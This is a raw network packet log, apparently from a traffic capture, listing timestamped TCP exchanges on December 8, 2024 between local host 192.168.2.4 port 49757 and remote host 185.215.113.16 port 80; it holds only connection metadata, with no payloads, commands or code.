Dec 8, 2024 19:52:40.521059036 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.521115065 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.521161079 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.521946907 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.521991968 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.522023916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.522063971 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.522826910 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.522960901 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.523046970 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.523679972 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.523734093 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.523802996 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.523844004 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.524708033 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.524748087 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.524898052 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.524981022 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.525656939 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.525702000 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.525738001 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.525782108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.526380062 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.526411057 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.526427984 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.526514053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.527244091 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.527292013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.527386904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.527425051 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.528170109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.528223991 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.528354883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.528399944 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.529014111 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.529128075 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.529256105 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.529300928 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.529957056 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.530006886 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.530180931 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.530226946 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.530852079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.530910969 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.531155109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.531204939 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.531723976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.531778097 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.531855106 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.531905890 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.532617092 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.532669067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.532741070 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.532788038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.533529043 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.533584118 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.533616066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.533655882 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.534326077 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.534377098 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.680730104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.680809021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.680823088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.680866003 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.680968046 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.681047916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.681102037 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.681901932 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.681957960 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.682014942 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.682064056 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.682724953 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.682777882 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.682832003 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.682873964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.683684111 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.683736086 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.683839083 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.683887959 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.684531927 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.684585094 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.684607029 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.684652090 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.685410976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.685456991 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.685519934 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.685566902 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.686280966 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.686328888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.686410904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.686459064 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.687227011 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.687278986 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.687350988 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.687402010 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.688051939 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.688106060 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.688139915 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.688189983 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.688920975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.688971996 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.689008951 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.689052105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.689836979 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.689886093 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.689898968 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.689943075 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.690710068 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.690762043 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.690790892 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.690846920 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.691582918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.691649914 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.691706896 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.691750050 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.692545891 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.692591906 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.692647934 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.692691088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.693341017 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.693386078 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.693466902 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.693510056 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.694322109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.694366932 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.694396973 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.694433928 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.695168972 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.695216894 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.695250988 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.695291996 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.696075916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.696124077 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.696187019 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.696229935 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.696906090 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.696952105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.697079897 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.697125912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.697778940 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.697824955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.697887897 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.697942972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.698652029 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.698699951 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.698761940 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.698817015 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.699546099 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.699590921 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.699651003 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.699695110 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.700485945 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.700534105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.700546026 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.700591087 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.701366901 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.701414108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.701425076 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.701467037 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.702229977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.702274084 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.702367067 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.702414989 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.703147888 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.703221083 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.703239918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.703289032 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.703958988 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.704021931 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.704068899 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.704114914 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.704962015 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.704974890 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.705040932 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.705754995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.705821991 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.705856085 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.705900908 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.706633091 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.706696987 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.706768990 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.706809998 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.707525015 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.707577944 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.707592010 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.707636118 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.708441973 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.708487988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.708512068 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.708559990 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.709542990 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.709594011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.709887981 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.709939957 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.710390091 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.710441113 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.710469007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.710513115 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.711090088 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.711139917 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.711206913 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.711249113 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.711975098 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.712044954 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.712073088 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.712116003 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.712879896 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.712922096 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.713069916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.713118076 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.713721991 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.713768005 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.713828087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.713881016 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.714715004 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.714762926 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.714838982 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.714883089 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.715476990 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.715527058 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.715599060 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.715661049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.716387033 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.716434956 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.716512918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.716561079 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.717271090 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.717315912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.717372894 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.717416048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.718144894 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.718195915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.718229055 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.718274117 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.719118118 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.719166040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.719187021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.719232082 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.720061064 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.720108032 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.720130920 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.720180988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.720912933 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.720963001 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.721050024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.721096039 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.721759081 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.721807957 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.721832991 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.721875906 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.722605944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.722651958 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.722671986 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.722687960 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.723483086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.723531961 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.723613024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.723665953 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.724354982 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.724400997 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.724411964 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.724456072 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.725254059 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.725298882 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.725327969 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.725368023 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.726644993 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.726695061 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.726696968 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.726736069 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.727205038 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.727250099 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.873045921 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.873110056 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.873183012 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.873204947 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.873224020 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.873253107 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.873279095 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.874083042 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.874186993 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.874243021 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.875011921 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.875205040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.875253916 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.875888109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.875941038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.875968933 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.876010895 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.876744986 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.876837015 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.876915932 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.876972914 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.877665043 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.877721071 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.877798080 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.877876997 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.878514051 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.878628016 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.878647089 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.878685951 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.879434109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.879560947 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.879621983 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.880320072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.880364895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.880378008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.880408049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.881184101 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.881232023 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.881272078 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.881320000 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.882070065 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.882116079 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.882189035 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.882229090 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.883009911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.883053064 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.883085012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.883124113 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.883826971 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.883874893 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.883930922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.883966923 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.884718895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.884840012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.884892941 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.885628939 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.885678053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.885916948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.886087894 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.886509895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.886609077 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.886672974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.887399912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.887458086 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.887586117 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.887638092 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.888365030 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.888415098 CET	49757	80	192.168.2.4	185.215.113.16
